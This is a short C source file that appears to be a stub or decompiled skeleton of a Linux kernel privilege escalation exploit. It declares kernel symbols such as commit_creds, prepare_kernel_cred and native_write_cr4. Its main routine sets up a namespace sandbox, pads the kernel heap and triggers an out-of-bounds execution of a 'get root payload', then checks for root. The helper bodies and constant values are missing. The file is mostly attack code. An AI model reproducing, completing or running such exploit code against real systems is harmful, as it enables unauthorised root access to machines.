
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ COMMIT_CREDS ;
 int CR4_DESIRED_VALUE ;
 scalar_t__ KERNEL_BASE ;
 int KMALLOC_PAD ;
 scalar_t__ NATIVE_WRITE_CR4 ;
 int PAGEALLOC_PAD ;
 scalar_t__ PREPARE_KERNEL_CRED ;
 int check_root () ;
 scalar_t__ get_kernel_addr () ;
 int get_root_payload ;
 int kmalloc_pad (int ) ;
 int oob_id_match_execute (void*) ;
 int oob_timer_execute (void*,int ) ;
 int pagealloc_pad (int ) ;
 int printf (char*,...) ;
 int setup_sandbox () ;
 int sleep (int) ;

int main() {
 printf("[.] starting\n");

 setup_sandbox();

 printf("[.] namespace sandbox set up\n");







 printf("[.] commit_creds:        %lx\n", KERNEL_BASE + COMMIT_CREDS);
 printf("[.] prepare_kernel_cred: %lx\n", KERNEL_BASE + PREPARE_KERNEL_CRED);





 printf("[.] padding heap\n");
 kmalloc_pad(KMALLOC_PAD);
 pagealloc_pad(PAGEALLOC_PAD);
 printf("[.] done, heap is padded\n");







 printf("[.] executing get root payload %p\n", &get_root_payload);
 oob_id_match_execute((void *)&get_root_payload);
 printf("[.] done, should be root now\n");

 check_root();

 while (1) sleep(1000);

 return 0;
}
